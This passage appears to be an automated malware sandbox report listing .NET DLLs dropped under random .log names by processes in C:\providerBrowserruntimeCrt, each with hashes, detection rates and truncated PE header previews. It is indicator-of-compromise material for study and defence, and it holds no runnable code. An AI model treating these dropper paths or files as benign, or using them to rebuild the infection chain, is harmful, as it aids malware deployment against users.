SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LVvPQgSP.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MebxBNFC.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.529329139831718
Encrypted:	false
SSDEEP:	384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
MD5:	8AE2B8FA17C9C4D99F76693A627307D9
SHA1:	7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
SHA-256:	0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
SHA-512:	DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NJzXBuON.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NkZFHznt.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NsJXliNz.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\QURoIJFv.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\QzpNJrOH.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RRtweJUq.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RbQwOwnn.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\STjOtvME.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VIjnlGUj.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VMyxesyD.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VWRNVcdg.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WJZFAsNx.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\WsSnlWTv.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YYEvrLib.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YuFVHGXq.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\bnUEsCJp.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	5.905167202474779
Encrypted:	false
SSDEEP:	1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
MD5:	06442F43E1001D860C8A19A752F19085
SHA1:	9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
SHA-256:	6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
SHA-512:	3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....

C:\Users\user\Desktop\dpGmOlNk.log

Download File

Process:	C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fneLqjpL.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\fwOdVSPR.log

Download File

Process:	C:\providerBrowserruntimeCrt\Providerbroker.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

